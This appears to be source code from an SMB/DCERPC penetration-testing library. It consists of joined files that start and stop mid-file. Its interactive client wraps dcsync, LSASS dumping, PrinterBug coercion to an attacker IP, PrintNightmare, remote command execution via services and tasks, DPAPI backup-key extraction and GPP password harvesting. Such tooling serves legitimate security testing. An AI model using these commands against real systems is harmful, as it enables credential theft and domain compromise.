		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except Exception as e:
			traceback.print_exc()

	async def do_use(self, share_name):
		"""selects share to be used"""
		try:
			if self.is_anon is False or self.no_dce:
				#anonymous connection might not have access to IPC$ so we are skipping the check
				if len(self.shares) == 0:
					_, err = await self.do_shares(show = False)
					if err is not None:
						raise err

				if share_name not in self.shares:
					if share_name.upper() not in self.shares:
						print('Error! Uknown share name %s' % share_name)
						return
					share_name = share_name.upper()

				self.__current_share = self.shares[share_name]
			else:
				self.__current_share = SMBShare.from_unc('\\\\%s\\%s' % (self.connection.target.get_hostname_or_ip(), share_name))
			_, err = await self.__current_share.connect(self.connection)
			if err is not None:
				raise err
			self.__current_directory = self.__current_share.subdirs[''] #this is the entry directory
			self.prompt = '[%s]$ ' % self.__current_directory.unc_path
			_, err = await self.do_refreshcurdir()
			if err is not None:
				raise err
			return True, None

		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e
			
	async def do_dir(self):
		return await self.do_ls()

	async def do_ls(self):
		try:
			if self.__current_share is None:
				print('No share selected!')
				return
			if self.__current_directory is None:
				print('No directory selected!')
				return
			
			for entry in self.__current_directory.get_console_output():
				print(entry)
			
			return True, None
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_refreshcurdir(self):
		try:
			async for entry in self.machine.list_directory(self.__current_directory):
				#no need to put here anything, the dir bject will store the refreshed data
				a = 1
			
			return True, None
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_cd(self, directory_name):
		try:
			if self.__current_share is None:
				print('No share selected!')
				return False, None
			if self.__current_directory is None:
				print('No directory selected!')
				return False, None
			
			if directory_name not in self.__current_directory.subdirs:
				if directory_name == '..':
					self.__current_directory = self.__current_directory.parent_dir
					self.prompt = '[%s] $' % (self.__current_directory.unc_path)
					return True, None
				else:
					print('The directory "%s" is not in parent directory "%s"' % (directory_name, self.__current_directory.fullpath))
					return False, None
			
			else:
				self.__current_directory = self.__current_directory.subdirs[directory_name]
				self.prompt = '[%s] $' % (self.__current_directory.unc_path)
				_, err = await self.do_refreshcurdir()
				if err is not None:
					raise err

				return True, None
			
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	def get_current_dirs(self):
		if self.__current_directory is None:
			return []
		return list(self.__current_directory.subdirs.keys())

	def get_current_files(self):
		if self.__current_directory is None:
			return []
		return list(self.__current_directory.files.keys())

	async def do_getfilesd(self, file_name):
		try:
			if file_name not in self.__current_directory.files:
				print('file not in current directory!')
				return False, None
			file_obj = self.__current_directory.files[file_name]
			sd, err = await file_obj.get_security_descriptor(self.connection)
			if err is not None:
				raise err
			print(sd.to_sddl())
			return True, None

		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_getdirsd(self):
		try:
			sd, err = await self.__current_directory.get_security_descriptor(self.connection)
			if err is not None:
				raise err
			print(str(sd.to_sddl()))
			return True, None
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	def _cd_completions(self):
		return SMBPathCompleter(get_current_dirs = self.get_current_dirs)

	def _get_completions(self):
		return SMBPathCompleter(get_current_dirs = self.get_current_files)
	
	def _del_completions(self):
		return SMBPathCompleter(get_current_dirs = self.get_current_files)
	
	def _sid_completions(self):
		return SMBPathCompleter(get_current_dirs = self.get_current_files)
	
	def _dirsid_completions(self):
		return SMBPathCompleter(get_current_dirs = self.get_current_dirs)


	async def do_services(self):
		"""Lists remote services"""
		try:
			async for service, err in self.machine.list_services():
				if err is not None:
					raise err
				print(service)
			
			return True, None
			
			
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_serviceen(self, service_name):
		"""Enables a remote service"""
		try:
			res, err = await self.machine.enable_service(service_name)
			if err is not None:
				raise err
			print(res)
			return True, None
		
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_servicecreate(self, service_name, command, display_name = None):
		"""Creates a remote service"""
		try:
			_, err = await self.machine.create_service(service_name, command, display_name)
			if err is not None:
				raise err
			print('Service created!')
			return True, None

		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e
	
	async def do_servicecmdexec(self, command, timeout = 1):
		"""Executes a shell command as a service and returns the result"""
		try:
			buffer = b''
			if timeout is None or timeout == '':
				timeout = 1
			timeout = int(timeout)
			async for data, err in self.machine.service_cmd_exec(command):
				if err is not None:
					raise err
				if data is None:
					break
				
				try:
					print(data.decode())
				except:
					print(data)
			return True, None

		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_servicedeploy(self, path_to_exec, remote_path):
		"""Deploys a binary file from the local system as a service on the remote system"""
		#servicedeploy /home/devel/Desktop/cmd.exe /shared/a.exe
		try:
			basename = ntpath.basename(remote_path)
			remote_path = '\\\\%s\\%s\\%s\\%s' % (self.connection.target.get_hostname_or_ip(), self.__current_share.name, self.__current_directory.fullpath , basename)
			_, err = await self.machine.deploy_service(path_to_exec, remote_path = remote_path)
			if err is not None:
				raise err
			print('Service deployed!')
			return True, None

		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_put(self, file_name):
		"""Uploads a file to the remote share"""
		try:
			basename = ntpath.basename(file_name)
			dst = '\\%s\\%s\\%s' % (self.__current_share.name, self.__current_directory.fullpath , basename)
			_, err = await self.machine.put_file(file_name, dst)
			if err is not None:
				print('Failed to put file! Reason: %s' % err)
				return False, err
			print('File uploaded!')
			_, err = await self.do_refreshcurdir()
			if err is not None:
				raise err
			
			return True, None

		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_del(self, file_name):
		"""Removes a file from the remote share"""
		try:
			basename = ntpath.basename(file_name)
			dst = '\\%s\\%s\\%s' % (self.__current_share.name, self.__current_directory.fullpath , basename)
			_, err = await self.machine.del_file(dst)
			if err is not None:
				raise err
			print('File deleted!')
			_, err = await self.do_refreshcurdir()
			if err is not None:
				raise err
			return True, None

		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_regsave(self, hive_name, file_path):
		"""Saves a registry hive to a file on remote share"""
		try:
			_, err = await self.machine.save_registry_hive(hive_name, file_path)
			if err is not None:
				raise err
			print('Hive saved!')
			return True, None
		
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_reglistusers(self):
		"""Saves a registry hive to a file on remote share"""
		try:
			users, err = await self.machine.reg_list_users()
			if err is not None:
				raise err
			for user in users:
				print(user)
			return True, None
		
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_get(self, file_name):
		"""Download a file from the remote share to the current folder"""
		try:
			matched = []
			if file_name not in self.__current_directory.files:
				
				for fn in fnmatch.filter(list(self.__current_directory.files.keys()), file_name):
					matched.append(fn)
				if len(matched) == 0:
					print('File with name %s is not present in the directory %s' % (file_name, self.__current_directory.name))
					return False, None
			else:
				matched.append(file_name)
			
			for file_name in matched:
				file_obj = self.__current_directory.files[file_name]
				with tqdm.tqdm(desc = 'Downloading %s' % file_name, total=file_obj.size, unit='B', unit_scale=True, unit_divisor=1024) as pbar:
					with open(file_name, 'wb') as outfile:
						async for data, err in self.machine.get_file_data(file_obj):
							if err is not None:
								raise err
							if data is None:
								break
							outfile.write(data)
							pbar.update(len(data))
			
			return True, None
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e


	
	async def do_mkdir(self, directory_name):
		"""Creates a directory on the remote share"""
		try:
			_, err = await self.machine.create_subdirectory(directory_name, self.__current_directory)
			if err is not None:
				raise err
			print('Directory created!')
			_, err = await self.do_refreshcurdir()
			if err is not None:
				raise err
			return True, None

		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_dcsync(self, username = None):
		"""It's a suprse tool that will help us later"""
		try:
			users = []
			if username is not None:
				users.append(username)
			async for secret, err in self.machine.dcsync(target_users=users):
				if err is not None:
					raise err
				if secret is None:
					continue
				print(str(secret))
			
			return True, None
		
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_users(self, domain = None):
		"""List users in domain"""
		try:
			async for username, user_sid, err in self.machine.list_domain_users(domain):
				if err is not None:
					print(str(err))
				print('%s %s' % (username, user_sid))
			
			return True, None
		
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_lsass(self):
		try:
			res, err = await self.machine.task_dump_lsass()
			if err is not None:
				print(str(err))
			print(res)

			await res.close()
		
			return True, None
		
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e

	async def do_printerbug(self, attacker_ip):
		"""Printerbug"""
		try:
			res, err = await self.machine.printerbug(attacker_ip)
			if err is not None:
				print(str(err))
			print(res)
		
			return True, None
		
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_tasks(self):
		"""List scheduled tasks """
		try:
			async for taskname, err in self.machine.tasks_list():
				if err is not None:
					raise err
				print(taskname)
			
			return True, None
		
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_taskregister(self, template_file, task_name = None):
		"""Registers a new scheduled task"""
		try:
			with open(template_file, 'r') as f:
				template = f.read()

			res, err = await self.machine.tasks_register(template, task_name = task_name)
			if err is not None:
				logger.info('[!] Failed to register new task!')
				raise err
		
			return True, None
		
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_taskdel(self, task_name):
		"""Deletes a scheduled task	"""
		try:
			_, err = await self.machine.tasks_delete(task_name)
			if err is not None:
				raise err

			return True, None
		
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e


	async def do_taskcmdexec(self, command, timeout = 1):
		""" Executes a shell command using the scheduled tasks service"""
		try:
			buffer = b''
			if timeout is None or timeout == '':
				timeout = 1
			timeout = int(timeout)
			async for data, err in self.machine.tasks_cmd_exec(command, timeout):
				if err is not None:
					raise err
				if data is None:
					break
				
				try:
					print(data.decode())
				except:
					print(data)
			return True, None
			
			#await self.machine.tasks_execute_commands([command])
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except Exception as e:
			traceback.print_exc()

	async def do_interfaces(self):
		""" Lists all network interfaces of the remote machine """
		try:
			interfaces, err = await self.machine.list_interfaces()
			if err is not None:
				raise err
			for iface in interfaces:
				print('%d: %s' % (iface['index'], iface['address']))
			
			return True, None
		
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_enumall(self, depth = 3):
		""" Enumerates all shares for all files and folders recursively """
		try:
			depth = int(depth)
			async for path, otype, err in self.machine.enum_all_recursively(depth = depth):
				if otype is not None:
					print('[%s] %s' % (otype[0].upper(), path))
				if err is not None:
					print('[E] %s %s' % (err, path))

			return True, None
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_printerenumdrivers(self):
		""" Enumerates all shares for all files and folders recursively """
		try:
			drivers, err = await self.machine.enum_printer_drivers()
			if err is not None:
				raise err
			for driver in drivers:
				print(driver)
			return True, None
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_printnightmare(self, share, driverpath = ''):
		""" printnightmare bug using the RPRN protocol """
		try:
			if len(driverpath) == 0:
				driverpath = None
			_, err = await self.machine.printnightmare(share, driverpath)
			if err is not None:
				raise err
			return True, None
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e
	
	async def do_parprintnightmare(self, share, driverpath = ''):
		""" printnightmare bug using the PAR protocol """
		try:
			if len(driverpath) == 0:
				driverpath = None
			_, err = await self.machine.par_printnightmare(share, driverpath)
			if err is not None:
				raise err
			return True, None
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_backupkeys(self, outfile = None):
		"""Obtains the DPAPI domain backup keys"""
		try:
			backupkeys, err = await self.machine.get_backupkeys()
			if err is not None:
				raise err
			for guid in backupkeys:
				if outfile is None or len(outfile) == 0:
					print('GUID: %s' % guid)
				if 'legacykey' in backupkeys[guid]:
					if outfile is None or len(outfile) == 0:
						print('Legacy key: 0x%s' % backupkeys[guid]['legacykey'].hex())
					else:
						with open('%s_%s_%s.key' % (outfile, guid, 'legacykey'), 'wb') as f:
							f.write(backupkeys[guid]['legacykey'])
				if 'pvk' in backupkeys[guid]:
					if outfile is None or len(outfile) == 0:
						print('PVK: %s' % backupkeys[guid]['pvk'].to_bytes().hex())
					else:
						with open('%s_%s.pvk' % (outfile, guid), 'wb') as f:
							f.write(backupkeys[guid]['pvk'].to_bytes())
				if 'certificate' in backupkeys[guid]:
					if outfile is None or len(outfile) == 0:
						print('Certificate: \r\n%s' % backupkeys[guid]['certificate'].hex())
					else:
						with open('%s_%s.der' % (outfile, guid), 'wb') as f:
							f.write(backupkeys[guid]['certificate'])
				if outfile is None or len(outfile) == 0:
					print('')
				else:
					print('Backupkey saved to disk')
			return True, None
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e
		
	async def cpasswd(self):
		"""Searches for cpassword in GPP files"""
		try:
			async for filename, username, cpassword, xmltype, err in self.machine.get_cpasswd(depth = 5):
				if err is not None:
					raise err
				print('Filename: %s' % filename)
				print('Username: %s' % username)
				print('Cpassword: %s' % cpassword)
				print('Type: %s' % xmltype)
				print('')
			print('Done!')
			return True, None
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_pipetest(self, data = 'HELLO!'):
		""" pipetest """
		async def temp(pipe):
			try:
				await asyncio.sleep(5)
				data = 'HELLO!!!\r\n'.encode('utf-8')
				data = len(data).to_bytes(4, byteorder='little', signed=False) + data
				while True:
					_, err = await pipe.write(data)
					if err is not None:
						raise err
					await asyncio.sleep(1)

			except:
				traceback.print_exc()
		
		pipe = None
		try:
			
			pipe = SMBFile.from_uncpath('\\\\%s\\IPC$\\%s' % (self.connection.target.get_hostname_or_ip(), 'testpipe'))
			
			_, err = await pipe.open_pipe(self.connection, 'rw')
			if err is not None:
				raise err

			data = bytes.fromhex('00000022000570b75f7cf1897fd2a679b70e9a46d5475443500004acd9a84e005001')
			_, err = await pipe.write(data)
			if err is not None:
				raise err
			
			#asyncio.create_task(temp(pipe))
			while True:
				data, err = await pipe.read(4)
				if err is not None:
					raise err
				print(data)
				await asyncio.sleep(2)
			return True, None
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e
		finally:
			if pipe is not None:
				await pipe.close()
	

async def amain(args):
	client = SMBClient(args.smb_url, silent = args.silent)
	if len(args.commands) == 0:
		if args.no_interactive is True:
			print('Not starting interactive!')
			return
		res = await client._run_single_command('login', [])
		if res is False:
			return
		await client.run()
	else:
		for command in args.commands:
			if command == 'i':
				await client.run()
				return
			
			cmd = shlex.split(command)
			if cmd[0] == 'login':
				_, err = await client.do_login()
				if err is not None:
					return
				continue
			
			await client._run_single_command(cmd[0], cmd[1:])
		await client.do_logout()

def main():
	import argparse
	import platform
	import logging
	from asysocks import logger as asylogger
	from asyauth import logger as asyauthlogger
	
	parser = argparse.ArgumentParser(description='Interactive SMB client')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	parser.add_argument('-s', '--silent', action='store_true', help='do not print banner')
	parser.add_argument('-n', '--no-interactive', action='store_true')
	parser.add_argument('smb_url', help = 'Connection string that describes the authentication and target. Example: smb+ntlm-password://TEST\\Administrator:password@10.10.10.2')
	parser.add_argument('commands', nargs='*')
	
	args = parser.parse_args()
	if args.silent is False:
		print(__banner__)

	if args.verbose >=1:
		logger.setLevel(logging.DEBUG)
		asyauthlogger.setLevel(logging.DEBUG)

	if args.verbose > 2:
		print('setting deepdebug')
		logger.setLevel(1) #enabling deep debug
		sockslogger.setLevel(1)
		asylogger.setLevel(1)
		asyauthlogger.setLevel(1)
		asyncio.get_event_loop().set_debug(True)
		logging.basicConfig(level=logging.DEBUG)

	asyncio.run(amain(args))

if __name__ == '__main__':
	main()
	
	

	


import io
import enum
from aiosmb.dcerpc.v5.protocol.con.constants import PTYPE, PFC
from aiosmb.dcerpc.v5.protocol.con.commons import PresentationSyntax


class ResultEnum(enum.Enum):
	ACCEPTANCE = 0
	USER_REJECTION = 1
	PROVIDER_REJECTION = 2

class ProviderReason(enum.Enum):
	REASON_NOT_SPECIFIED = 0
	ABSTRACT_SYNTAX_NOT_SUPPORTED = 1
	PROPOSED_TRANSFER_SYNTAXES_NOT_SUPPORTED = 2
	LOCAL_LIMIT_EXCEEDED = 3

class Result_T:
	def __init__(self):
		self.result = None
		self.reason = None
		self.transfer_syntax = None
	
	@staticmethod
	def from_bytes(data):
		return Result_T.from_buffer(io.BytesIO(data))
	
	@staticmethod
	def from_buffer(buff):
		res = Result_T()
		res.result = ResultEnum(int.from_bytes(buff.read(2), byteorder='little', signed=False))
		res.reason  = ProviderReason(int.from_bytes(buff.read(2), byteorder='little', signed=False))
		res.transfer_syntax = PresentationSyntax.from_buffer(buff)
		return res
	
	def __str__(self):
		return "Result_T : result: %s reason: %s transfer_syntax: %s" % (self.result, self.reason, self.transfer_syntax)
	
	def __repr__(self):
		return self.__str__()


class Result_List_T:
	def __init__(self):
		self.n_results = None
		self.reserved = None
		self.reserved2 = None
		self.results = []
	
	@staticmethod
	def from_bytes(data):
		return Result_List_T.from_buffer(io.BytesIO(data))
	
	@staticmethod
	def from_buffer(buff):
		res = Result_List_T()
		res.n_results = int.from_bytes(buff.read(1), byteorder='little', signed=False)
		res.reserved  = buff.read(1)
		res.reserved2 = buff.read(2)
		for _ in range(res.n_results):
			res.results.append(Result_T.from_buffer(buff))
		return res
	
	def __str__(self):
		t = "Result_List_T\r\n"
		for entry, i in enumerate(self.results):
			t += '%s : %s' % (i, entry)
		return t
	
	def __repr__(self):
		return self.__str__()


class PORT_ANY_T:
	def __init__(self):
		self.length = None
		self.port_spec = None #string with null terminator
	
	@staticmethod
	def from_bytes(data):
		return PORT_ANY_T.from_buffer(io.BytesIO(data))
	
	@staticmethod
	def from_buffer(buff):
		res = PORT_ANY_T()
		res.length = int.from_bytes(buff.read(2), byteorder='little', signed=False)
		res.port_spec = buff.read(res.length).decode('ascii')
		return res
	
	def __str__(self):
		return 'PORT_ANY_T: port_spec: %s' % self.port_spec
	
	def __repr__(self):
		return self.__str__(self)

class BINDACKPDU:
	def __init__(self) -> None:
		self.rpc_vers = 5
		self.rpc_vers_minor = 0
		self.PTYPE = PTYPE.BINDACK
		self.pfc_flags = None
		self.packed_drep = None
		self.frag_length = None
		self.auth_length = None
		self.call_id = None

		self.max_xmit_frag = None
		self.max_recv_frag = None
		self.assoc_group_id = None
		self.sec_addr = None # port_any_t

		#ALIGN(4)
		self.pad2 = None
		self.context_list = None


		self.auth_verifier = None #auth_verifier_co_t
	
	@staticmethod
	def from_bytes(data):
		return BINDACKPDU.from_buffer(io.BytesIO(data))
	
	@staticmethod
	def from_buffer(buff):
		res = BINDACKPDU()
		res.rpc_vers = int.from_bytes(buff.read(1), byteorder='little', signed=False)
		res.rpc_vers_minor = int.from_bytes(buff.read(1), byteorder='little', signed=False)
		res.PTYPE = PTYPE(int.from_bytes(buff.read(1), byteorder='little', signed=False))
		res.pfc_flags = PFC(int.from_bytes(buff.read(1), byteorder='little', signed=False))
		res.packed_drep = buff.read(4)
		res.frag_length = int.from_bytes(buff.read(2), byteorder='little', signed=False)
		res.auth_length = int.from_bytes(buff.read(2), byteorder='little', signed=False)
		res.call_id = int.from_bytes(buff.read(4), byteorder='little', signed=False)
		res.max_xmit_frag = int.from_bytes(buff.read(2), byteorder='little', signed=False)
		res.max_recv_frag = int.from_bytes(buff.read(2), byteorder='little', signed=False)
		res.assoc_group_id = buff.read(4)
		res.sec_addr = PORT_ANY_T.from_buffer(buff)
		_, padsize = divmod(buff.tell(),4) #ALIGN
		res.pad2 = buff.read(4-padsize)
		res.context_list = Result_List_T.from_buffer(buff)
		
		if res.auth_length > 0:
			res.auth_verifier = buff.read(res.auth_length)
		return res
	
	def __str__(self):
		t = 'BINDACKPDU\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for entry, i in enumerate(self.__dict__[k]):
					print(entry)
					t += '%s : %s : %s\r\n' % (k, i, str(entry))
			else:
				t += '%s : %s\r\n' % (k, self.__dict__[k])
		return t

if __name__ == '__main__':
	data = bytes.fromhex('05000c03100000004400000001000000b810b810126700000d005c504950455c73727673766300000100000000000000045d888aeb1cc9119fe808002b10486002000000')
	x = BINDACKPDU.from_bytes(data)
	print(str(x))



import logging
from aiosmb import logger
import traceback

from aiosmb.dcerpc.v5.common.connection.authentication import DCERPCAuth
from aiosmb.dcerpc.v5.common.connection.target import DCERPCTarget
from aiosmb.connection import SMBConnection
from aiosmb.dcerpc.v5.connection import DCERPC5Connection
from aiosmb.dcerpc.v5.common.secrets import SMBUserSecrets
from aiosmb.wintypes.dtyp.structures.filetime import FILETIME
from aiosmb.wintypes.dtyp.constrcuted_security.sid import SID
from aiosmb.dcerpc.v5.dtypes import NULL
from aiosmb.dcerpc.v5.uuid import string_to_bin
from aiosmb.dcerpc.v5 import drsuapi, samr
from aiosmb.dcerpc.v5.interfaces.endpointmgr import EPM
from aiosmb.dcerpc.v5.interfaces.servicemanager import *
from aiosmb.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,\
	RPC_C_AUTHN_LEVEL_PKT_PRIVACY,\
	RPC_C_AUTHN_LEVEL_CONNECT, DCERPCException, RPC_C_AUTHN_GSS_NEGOTIATE


class DRSUAPIRPC:
	def __init__(self, domainname = None):
		self.domainname = domainname
		self.service_uuid = drsuapi.MSRPC_UUID_DRSUAPI
		
		self.dce = None
		self.handle = None
		
		self.__NtdsDsaObjectGuid = None
		self.__ppartialAttrSet = None
		
		self.ATTRTYP_TO_ATTID = {
				'userPrincipalName': '1.2.840.113556.1.4.656',
				'sAMAccountName': '1.2.840.113556.1.4.221',
				'unicodePwd': '1.2.840.113556.1.4.90',
				'dBCSPwd': '1.2.840.113556.1.4.55',
				'ntPwdHistory': '1.2.840.113556.1.4.94',
				'lmPwdHistory': '1.2.840.113556.1.4.160',
				'supplementalCredentials': '1.2.840.113556.1.4.125',
				'objectSid': '1.2.840.113556.1.4.146',
				'pwdLastSet': '1.2.840.113556.1.4.96',
				'userAccountControl':'1.2.840.113556.1.4.8',
			}
			
		self.NAME_TO_ATTRTYP = {
